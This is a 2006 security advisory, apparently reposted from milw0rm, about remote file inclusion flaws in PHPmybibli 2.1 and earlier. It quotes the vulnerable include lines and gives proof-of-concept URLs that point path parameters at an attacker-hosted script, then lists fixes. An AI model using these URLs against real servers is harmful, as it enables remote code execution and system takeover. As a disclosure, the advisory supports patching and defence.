____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | \ /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID ECHO_ADV_55$2006 ----------------------------------------------------------------------------------------------- [ECHO_ADV_55$2006]Phpmybibli <=2.1 Multiple Remote File Inclusion Vulnerability ----------------------------------------------------------------------------------------------- Author : Dedi Dwianto a.k.a the_day Date Found : October, 17th 2006 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv55-theday-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : PHPmybibli version : <=2.1 URL : http://www.pizz.net/ --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~ I found vulnerability script cart.php --------------------------cart.php--------------------------------------- .... <? include_once("$include_path/cart.inc.php"); include_once("$include_path/templates/cart.tpl.php"); include_once("$include_path/isbn.inc.php"); include_once("$include_path/expl_info.inc.php"); include_once("$include_path/bull_info.inc.php"); include_once("$include_path/notice_authors.inc.php"); include_once("$include_path/notice_categories.inc.php"); include_once("$include_path/explnum.inc.php"); include_once("$class_path/cart.class.php"); include_once("$class_path/caddie.class.php"); include_once("$class_path/author.class.php"); include_once("$class_path/collection.class.php"); include_once("$class_path/subcollection.class.php"); include_once("$class_path/mono_display.class.php"); include_once("$class_path/serie.class.php"); include_once("$class_path/serial_display.class.php"); include_once("$class_path/serials.class.php"); include_once("$class_path/editor.class.php"); require_once("$class_path/emprunteur.class.php"); require_once("$javascript_path/misc.inc.php"); ... ---------------------------------------------------------- Input passed to the "$include_path" parameter in cart.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources. Also affected files on Files: edit.php circ.php index.php select.php etc.. Proof Of Concept: ~~~~~~~~~~~~~~ http://target.com/[phpmybibli_path]/index.php?class_path=http://attacker.com/inject.txt? http://target.com/[phpmybibli_path]/edit.php?javascript_path=http://attacker.com/inject.txt? http://target.com/[phpmybibli_path]/circ.php?include_path=http://attacker.com/inject.txt? Solution: ~~~~~~ - Sanitize variable $class_path,$javascript_path,$include_path on affected files. - Turn off register_globals --------------------------------------------------------------------------- Shoutz: ~~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous ~ Jessy My Brain ~ az001,bomm_3x,matdhule,angelia ~ newbie_hacker@yahoogroups.com ~ #aikmel - #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~ EcHo Research & Development Center the_day[at]echo[dot]or[dot]id -------------------------------- [ EOF ]---------------------------------- # milw0rm.com [2006-10-17]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论